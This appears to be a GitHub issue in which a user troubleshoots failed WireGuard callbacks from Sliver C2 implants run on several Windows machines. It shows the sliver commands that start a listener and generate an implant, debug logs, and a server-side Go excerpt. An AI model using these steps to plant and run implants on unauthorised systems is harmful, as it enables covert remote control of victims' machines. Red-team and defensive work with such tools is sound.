Issues with WireGuard Implant Callbacks Failing #2054
Description
Over the past few days of testing, I've tried running the sliver-server on several different VPSs. Following the documentation and using the steps below, I generated the implants. I then ran them on multiple Windows x64 systems across various network environments, but the callback has failed in every single case. I'm not sure what the problem is.
sliver > wg
[] Starting Wireguard listener ...
[] Successfully started job #1
sliver > jobs
ID Name Protocol Port Stage Profile
==== ====== ========== ====== ===============
1 wg udp 53
sliver > generate --wg x.x.x.x --arch amd64 --os windows
[] Generated unique ip for wg peer tun interface: 100.64.0.2
[] Generating new windows/amd64 implant binary
[] Build completed in 17s
[] Implant saved to /root/UNPLEASANT_CREST.exe
I ran UNPLEASANT_CREST.exe on a bunch of Win x64 machines in different networks, but they just won't callback.
So, I checked the firewall and confirmed that UDP port 53 was not blocked.To investigate the cause, I generated the implants with the --debug parameter to enable debug output.
I found that after execution, each implant gets stuck in a repetitive key exchange loop, ultimately failing with the following messages:"
2025/11/21 22:17:14 wireguard.go:184: Unable to connect to wg key exchange listener: connect tcp 100.64.0.1:1337: operation timed out
2025/11/21 22:17:14 sliver.go:158: [session] failed to establish connection: [wireguard] Cannot connect to empty IP address
"
I run them on several different Windows x64 systems across various network environments,I get the same result every time.
So, following the error message "100.64.0.1:1337: operation timed out", I checked the VPSs and confirmed that none of them are listening on port 1337. What could be the reason for this? When using WireGuard implants with Sliver, is the server supposed to listen on port 1337 under normal circumstances? I've started read the wireguard.go source code...
// Open up key exchange TCP socket
keyExchangeListener, err := tNet.ListenTCP(&net.TCPAddr{IP: net.ParseIP(tunIP), Port: int(keyExchangeListenPort)}) //!!!!!
if err != nil {
wgLog.Errorf("Failed to setup up wg key exchange listener: %v", err)
return nil, nil, nil, err
}
wgLog.Printf("Successfully setup up wg key exchange listener")
go acceptKeyExchangeConnection(keyExchangeListener)
// Open up c2 commincation listener TCP socket
listener, err := tNet.ListenTCP(&net.TCPAddr{IP: net.ParseIP(tunIP), Port: int(netstackPort)})
if err != nil {
wgLog.Errorf("Failed to setup up wg sliver listener: %v", err)
return nil, nil, nil, err
}
wgLog.Printf("Successfully setup up wg sliver listener")
go acceptWGSliverConnections(listener)
return listener, dev, wgConf, nil
I've discovered that " tNet.ListenTCP(&net.TCPAddr{IP: net.ParseIP(tunIP), Port: int(keyExchangeListenPort)}) " the key exchange process does indeed create a TCP socket and listens on a port (1337 by default). However, despite repeated attempts, even when using wg -x 1337, I can't get it to work. Am I missing a critical operational step? When I use other implants like mTLS, they callback successfully.
I've been struggling with this situation for several days now. I would be grateful if an expert could guide me.